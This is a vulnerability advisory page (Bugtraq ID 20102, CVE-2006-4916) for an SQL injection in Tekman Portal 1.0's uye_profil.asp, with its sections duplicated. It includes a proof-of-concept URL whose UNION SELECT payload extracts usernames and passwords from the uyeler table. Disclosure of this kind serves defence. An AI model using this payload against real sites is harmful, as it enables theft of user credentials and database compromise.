Tekman Portal Uye_Profil.ASP SQL Injection Vulnerability
BID:20102
CVE-2006-4916 |Info
Tekman Portal Uye_Profil.ASP SQL Injection Vulnerability
| Bugtraq ID: | 20102 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 19 2006 12:00AM |
| Updated: | Sep 20 2006 06:26PM |
| Credit: | Fix TR is credited with discovering this vulnerability. |
| Vulnerable: |
Tekman Portal Tekman Portal 1.0 |
| Not Vulnerable: | |
Discussion
Tekman Portal Uye_Profil.ASP SQL Injection Vulnerability
Tekman Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
This may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Tekman Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
This may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Exploit / POC
Tekman Portal Uye_Profil.ASP SQL Injection Vulnerability
An attacker can exploit this vulnerability using a web client.
The following proofs-of-concept is available:
http://www.example.com/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
An attacker can exploit this vulnerability using a web client.
The following proofs-of-concept is available:
http://www.example.com/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
Solution / Fix
Tekman Portal Uye_Profil.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Tekman Portal Uye_Profil.ASP SQL Injection Vulnerability
References:
References:
- Tekman Portal Homepage (Aspindir)